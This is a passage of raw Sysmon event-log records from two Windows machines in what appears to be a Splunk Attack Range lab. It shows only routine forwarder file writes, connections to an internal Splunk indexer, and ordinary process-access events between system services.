23542300x8000000000000000287558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:30.835{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1DAB9AD09AFB56603FB3BCF933D162F,SHA256=AD4E43515F3552D3F1F0F9ECB633733B4EBB0403A1613ECACF16F3C304459CCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216407Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:30.878{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C659FBB12B372F410FBDD7A6A3C39EBE,SHA256=D0230F5EC03488F63AA8267368E0F16EE96B7B41CE0B6878B403C4E82F4767A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216406Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:30.284{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=2B28FF58AD74AE64278DFF3B403260E0,SHA256=E28615412C00A41A9539DE487EAB4EBFF4101692ED54CDD3C2C2B9A1C1423E8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:31.882{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=634F39277939E9C0918CEB54FFDEF40E,SHA256=CA693B090748536E422AEAC1CA0D167338C38E8C00E3368A193537702BE978FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216408Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:31.893{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=315F29B152764AE098A188D82524C982,SHA256=7412E6719057730227B46AF6F18B4C67D8CF8566DED18755C057AEE3F7EC7E94,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:29.637{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53424-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:32.960{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F17CA38F5097AB5D6CB7CBBA4591FFE,SHA256=E61F983AB7DADE81AEA1E6C84B53BD99B63EECD0D0ABBEE5CC8BB312064CE87B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216412Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:32.893{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67EEE074FD569A5A88458C27D7560D29,SHA256=85DCCD62FC4BAAB89E854133C47F2E553CB112FA69B25733985DFB2CA067E705,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216411Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:32.706{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216410Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:32.706{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216409Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:32.706{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:33.976{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42C547201A80AF3F579ED5031E7215F4,SHA256=74F5DB4EAF223F9D941F93CC706F24095513F328BF9472A1C37D33A93E4E8E6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216413Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:33.909{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E83D70D6B59128E4386FA4928D6A1B29,SHA256=8BD4A9328158EBAFF204452FA164F67F31FF179070EC54643ADADA06690CAB76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:33.335{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=99986164A15E98D18017E1DC6DFD762E,SHA256=BA7791850D2C63D139A2482C0E723FBE08741472154BDB6FEB310A502ADB1025,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:34.992{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33ADFAF666C632169836152D240C20AB,SHA256=780CD64F443B86C36D4C9AE557AFCD559036511A316099A70944F59BD3D061FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216415Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:34.909{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59C5D453AB5D72B83F8EEC4A39557151,SHA256=861F5C43A02FD61A4E81205924AFFF506CF159791A3E2462C5DF3A3A7BFAD09D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216414Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:31.663{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51326-false10.0.1.12-8000- 23542300x8000000000000000216416Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:35.925{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=162705C701A603EC8679A7DD5915F676,SHA256=A7D7D7D4C7AC601E9931F495DC7693811B41F1A65A86E9BB345224C5135B1212,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216417Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:36.925{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6049A971E2B4061BD27D0B703DAFBA43,SHA256=33791A32B11E963D59BF2DDA487ECF1658CF9FD36684D2AF7A3C35C184F1BE30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:36.007{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=168B53EE59D02CB0EDF2DD12F6FB2D59,SHA256=834F9A1DBAED98B45601ED780A9722CB6DCC310C2B06B17B6CD9FC50F3A049CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216418Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:37.940{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D274D4E61B09554F865AD1DF31E9EA40,SHA256=FF756530610B6B35AA625E89FD890C2E5B0C5158BB84B20C1D797EB3CB424398,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:35.668{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53425-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:37.070{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=828FE01360A5F6CD2C96400818C8E1AA,SHA256=25BF98E5F009170CFD78D21FDD55EAFC5FCB78ECA8C2CF0903D7394247A4FEA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:38.101{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7A18FD11DB10D47656AF47D0746F0B6,SHA256=4D1FE7EB5F08C81BF053316C686DACCFF4A82F03D2FBC0EA7EDCE14ACE61DA91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:39.757{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:39.132{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F9A223BF5944EA4906F1039F2D6DBB9,SHA256=B11781857E2BA62356B15405EF5C17E1296474F58E1FD116D1527DF463519B4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216420Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:37.663{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51327-false10.0.1.12-8000- 23542300x8000000000000000216419Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:39.175{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=577D46F5B1781280A6BAFFBFC9B433A4,SHA256=F13B26F66A7068E046537FAFF116E5FF99E30EEB0596258B9FB234821B086C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:40.351{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09EE092E242105A017E50F02B2F0C1AA,SHA256=951E17CF9C2B75A54DF526DD3FBAEC12F7225A461EC8FBFD4C4AA296CF878C5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216421Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:40.346{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=029518CFA15D697ACAE2DE85B5578A0D,SHA256=8F44AC76F740792B0E2EFD8A4F894FC38718A741D044E537FE792B13E1B93240,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216422Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:41.409{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E75ECEF702A2618C3DEA62B681AB665,SHA256=804E1A382587DBA364E40A96C292D0D9A357333FF91CFAAF95C9580D4EB67BE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:39.215{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53426-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000287572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:41.367{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9934EC9F844DE168F839DDD8D2CE0DC9,SHA256=C493E95C81ACCD7496E6C49897AC397034BDA0AF561A34C5C3B8E349AF6384DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216423Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:42.615{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8882AC5BBB4DD6E443068B505BD53E1,SHA256=05E87C8A8662BDCF39981E40E90ABCEE2F89AD639746F295DE307387417124FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:42.382{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D636CA641C69415FE329D0F9AF86AF30,SHA256=A6817212F97AC31D02AD5D98C72FA46FC33ADE6E27EA4263178A4EB10DFADBAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216424Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:43.690{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C0DDCBDFDDEFC3A21803B128BBF4632,SHA256=7F22607D593BA74DF36E139152F43DD065939CE1ECFFC269C873BDA7FFC84565,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:41.543{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53427-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:43.414{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=711F90F20D3DAED7845B8D1D604C5DF9,SHA256=DE92D7DA0F2964729D831629ED1BBAAC47E71212FEFA908F0D4B63F8E8BF795D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216425Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:44.706{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B6F7F9010CE7CD6472A4035986973D1,SHA256=5DFEA781A5171C2E31F77C451742E3FF371B1ACAE76F1C73C55A361908F3B09B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:44.429{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17FE5DC256880832D3DC6A7ABED48D3F,SHA256=D6A7EC14028677DFD11CAB4A2C7107AF04298032528B21A64FDBD35AA885BBD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216453Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.971{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216452Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.800{4F8D34B0-1149-6216-5104-000000003902}24521932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:45.429{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8C0C6274CE3385D1913563057247EBB,SHA256=109682335E21D32F2F3740962AC45B353F1CF1E5940EB236D6B2C02008AEB3E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216451Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.596{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1149-6216-5104-000000003902}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216450Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:45.596{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216449Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 